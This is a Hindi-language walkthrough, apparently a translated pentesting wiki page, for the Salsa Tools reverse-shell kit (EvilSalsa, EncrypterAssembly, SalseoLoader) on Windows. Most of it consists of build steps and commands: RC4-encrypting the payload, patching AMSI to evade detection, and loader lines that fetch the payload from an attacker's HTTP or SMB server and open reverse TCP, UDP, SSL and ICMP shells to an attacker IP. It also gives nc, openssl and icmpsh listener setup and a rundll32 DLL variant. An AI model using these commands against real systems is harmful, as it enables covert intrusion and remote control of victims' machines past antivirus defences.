
Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP/Shellcode/SILENTTRINITY और AV बाइपास, AMSI पैच्ड
_____ __ ______ __
/ ___/____ _/ /________ _ /_ __/___ ____ / /____
\__ \/ __ `/ / ___/ __ `/ / / / __ \/ __ \/ / ___/
___/ / /_/ / (__ ) /_/ / / / / /_/ / /_/ / (__ )
/____/\__,_/_/____/\__,_/ /_/ \____/\____/_/____/
Salsa Tools तीन अलग-अलग टूलों का एक संग्रह है, जो संयुक्त रूप से किसी भी Windows वातावरण में एक उन्नत रिवर्स शेल प्राप्त करने की अनुमति देता है, बिना इसके निष्पादन के लिए PowerShell की भी आवश्यकता के। नवीनतम पहचान तकनीकों (AMSI) से बचने के लिए, अधिकांश घटक मूल रूप से C# में लिखे गए थे। Salsa Tools को लुइस वाकास द्वारा सार्वजनिक रूप से उनके वार्ता "Inmersión en la explotación tiene rima" के दौरान जारी किया गया था, जो 9 फरवरी 2019 को h-c0n में हुआ था।
* TCP/UDP/ICMP/DNS/BIND/SSL/Shellcode/SilentTrinity
* AV Safe (17 फरवरी)
* AMSI पैचर
* PowerShell निष्पादन
* ...
Salsa-Tools तीन अलग-अलग सामग्रियों से बना है: - EvilSalsa - EncrypterAssembly - SalseoLoader और इसका व्यवहार इस प्रकार है:
___ __ __ ____ _
/ _] | || || |
/ [_| | | | | | |
| _] | | | | | |___
| [_| : | | | | |
| |\ / | | | |
|_____| \_/ |____||_____|
_____ ____ _ _____ ____
/ ___/ / || | / ___/ / |
( \_ | o || | ( \_ | o |
\__ || || |___\__ || |
/ \ || _ || / \ || _ |
\ || | || \ || | |
\___||__|__||_____|\___||__|__|
[+] यह हमारा पेलोड है
EvilSalsa इस रेसिपी की मुख्य सामग्री है। इसमें पेलोड होता है, जो सिस्टम पर इस प्रकार निष्पादित होता है: जैसे ही पेलोड शुरू होता है, यह System.Management.Automation.dll को चलाता है जो एक रनस्पेस बनाता है। उस रनस्पेस के भीतर हमारे पास चार प्रकार के शेल होते हैं (TCP/UDP/ICMP/DNS/BINDTCP/SHELLCODE/SILENTTRINITY)। एक बार EvilSalsa लोड हो जाने पर, सबसे पहले c:\windows\system32\amsi.dll के अस्तित्व की जाँच की जाती है। यदि यह मौजूद है, तो इसे CyberArk और Rastamouse बाईपास के एक घरेलू संस्करण का उपयोग करके पैच किया जाता है।
______ _
| ____| | |
| |__ _ __ ___ _ __ _ _ _ __ | |_ ___ _ __
| __| | '_ \ / __| '__| | | | '_ \| __/ _ \ '__|
| |____| | | | (__| | | |_| | |_) | || __/ |
|______|_| |_|\___|_| \__, | .__/ \__\___|_|
/\ __/ | || | | |
/ \ ___ ___ ___ _|___/|_|| |__ | |_ _
/ /\ \ / __/ __|/ _ \ '_ ` _ \| '_ \| | | | |
/ ____ \\__ \__ \ __/ | | | | | |_) | | |_| |
/_/ \_\___/___/\___|_| |_| |_|_.__/|_|\__, |
__/ |
|___/
[+] RC4 का उपयोग करके पेलोड को एन्क्रिप्ट करने वाला सॉफ्टवेयर
[+] हमारे पास python और .exe दोनों संस्करण हैं
EncrypterAssembly का उपयोग Python स्क्रिप्ट या Exe बाइनरी के रूप में किया जा सकता है। यह पहले से उत्पन्न EvilSalsa को एन्क्रिप्ट करता है।
Python उपयोग:
python encrypterassembly.py <FILE> <PASSWORD> <OUTPUT>
निष्पादन योग्य उपयोग:
Encrypterassembly.exe <FILE> <PASSWORD> <OUTPUT>
SalseoLoader एन्क्रिप्टेड पेलोड को लोड करने के लिए जिम्मेदार है। इसे लाइब्रेरी या निष्पादन योग्य के रूप में कंपाइल किया जा सकता है। यदि इसे निष्पादन योग्य के रूप में चलाया जाता है, तो चुने गए तर्क निष्पादन के समय प्रदान किए जाने चाहिए। यदि इसे लाइब्रेरी के रूप में कंपाइल किया जाता है, तो डिस्क्रिप्टर "main" को एक्सपोर्ट किया जाना चाहिए। पर्यावरण चर का उपयोग करके तर्क जोड़े जाते हैं।
_____ ____ _ _____ ___ ___
/ ___/ / || | / ___/ / _] / \
( \_ | o || | ( \_ / [_ | |
\__ || || |___\__ || _]| O |
/ \ || _ || / \ || [_ | |
\ || | || \ || || |
\___||__|__||_____|\___||_____| \___/
_ ___ ____ ___ ___ ____
| | / \ / || \ / _]| \
| | | || o || \ / [_ | D )
| |___ | O || || D || _]| /
| || || _ || || [_ | \
| || || | || || || . \
|_____| \___/ |__|__||_____||_____||__|\_|
By: CyberVaca@HackPlayers
[+] उपयोग:
[-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT
[-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT
[-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseICMP LHOST
[-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS
[-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT
[-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT
[-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode
[-] SalseoLoader.exe password http://webserver.com/silent.txt silenttrinity URL_C2C
[+] उपलब्ध पेलोड:
[-] ReverseTCP [-] ReverseDNS [-] ReverseSSL [-] Shellcode
[-] ReverseUDP [-] ReverseICMP [-] BindTCP [-] SilentTrinity
GitHub से सोर्स कोड डाउनलोड करें और EvilSalsa और SalseoLoader को कंपाइल करें। आपको कोड को कंपाइल करने के लिए Visual Studio इंस्टॉल करने की आवश्यकता होगी।
उन प्रोजेक्ट्स को उस विंडोज मशीन की आर्किटेक्चर के लिए कंपाइल करें जहाँ आप उनका उपयोग करने जा रहे हैं (यदि विंडोज x64 का समर्थन करता है, तो उन्हें उस आर्किटेक्चर के लिए कंपाइल करें)।
आप Visual Studio के अंदर बाएं "Build" टैब में "Platform Target" में आर्किटेक्चर चुन सकते हैं।
(यदि आपको ये विकल्प नहीं मिलते हैं, तो "Project Tab" पर प्रेस करें और फिर " Properties" पर प्रेस करें)

फिर, दोनों प्रोजेक्ट्स को बिल्ड करें (Build -> Build Solution) (लॉग में निष्पादन योग्य का पथ दिखाई देगा):

सबसे पहले, आपको EvilSalsa.dll को एन्कोड करने की आवश्यकता होगी। ऐसा करने के लिए, आप Python स्क्रिप्ट encrypterassembly.py का उपयोग कर सकते हैं या प्रोजेक्ट EncrypterAssembly को कंपाइल कर सकते हैं।
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll password evilsalsa.dll.txt
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsa.dll password evilsalsa.dll.txt
ठीक है, अब आपके पास वह सब कुछ है जो आपको पूरे Salseo कार्य को निष्पादित करने के लिए चाहिए: एन्कोडेड EvilSalsa.dll और SalseoLoader की बाइनरी। SalseoLoader.exe बाइनरी को मशीन पर अपलोड करें। इसे किसी भी AV द्वारा पहचाना नहीं जाना चाहिए...
रिवर्स शेल लिसनर के रूप में nc, और एन्कोडेड evilsalsa को सर्व करने के लिए एक HTTP सर्वर शुरू करना याद रखें।
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
रिवर्स शेल लिसनर के रूप में nc, और एन्कोडेड evilsalsa को सर्व करने के लिए एक SMB सर्वर (impacket-smbserver) शुरू करना याद रखें।
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
हमलावर मशीन के अंदर लिसनर सेट करें:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -key key.pem -cert cert.pem -port <port> -tls1
बैकडोर निष्पादित करें:
SalseoLoader.exe password C:/path/to/evilsalsa.dll.txt ReverseSSL <Attacker-IP> <Port>
इस बार आपको क्लाइंट पर रिवर्स शेल प्राप्त करने के लिए एक विशेष टूल की आवश्यकता है। डाउनलोड करें: [https://github.com/inquisb/icmpsh]
ICMP रिप्लाई अक्षम करें:
#जब आप समाप्त कर लें, तो आप इसे फिर से सक्षम कर सकते हैं:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
क्लाइंट निष्पादित करें:
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
पीड़ित के अंदर, salseo चीज़ निष्पादित करें:
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
Visual Studio का उपयोग करके SalseoLoader प्रोजेक्ट खोलें।
main फंक्शन से पहले यह लाइन जोड़ें: [DllExport]

Tools --> NuGet Package Manager --> Manage NuGet Packages for Solution...

DllExport पैकेज खोजें (Browse टैब का उपयोग करके), और Install प्रेस करें (और पॉपअप स्वीकार करें)

आपके प्रोजेक्ट फ़ोल्डर में फाइलें दिखाई दी हैं: DllExport.bat और DllExport_Configure.bat
Uninstall प्रेस करें (हाँ, यह अजीब है लेकिन मेरा विश्वास करें, यह आवश्यक है)

बस Visual Studio से बाहर निकलें।
फिर, अपने SalseoLoader फ़ोल्डर में जाएं और DllExport_Configure.bat निष्पादित करें। x64 चुनें (यदि आप इसे x64 मशीन के अंदर उपयोग करने जा रहे हैं, यह मेरा मामला था), System.Runtime.InteropServices (DllExport के लिए नेमस्पेस के अंदर) चुनें और Apply प्रेस करें।

[DllExport] अब त्रुटि के रूप में चिह्नित नहीं होना चाहिए।

Output Type = Class Library चुनें (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)

x64 प्लेटफ़ॉर्म चुनें (Project --> SalseoLoader Properties --> Build --> Platform target = x64)

समाधान को बिल्ड करने के लिए: Build --> Build Solution (आउटपुट कंसोल में नई DLL का पथ दिखाई देगा)
DLL को वहाँ कॉपी और पेस्ट करें जहाँ आप इसका परीक्षण करना चाहते हैं।
निष्पादित करें:
rundll32.exe SalseoLoader.dll,main
यदि कोई त्रुटि नहीं आती है, तो संभवतः आपके पास एक कार्यात्मक dll है!!
HTTP सर्वर का उपयोग करना और nc लिसनर सेट करना न भूलें
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
द्वारा प्रलेखित https://github.com/carlospolop-forks/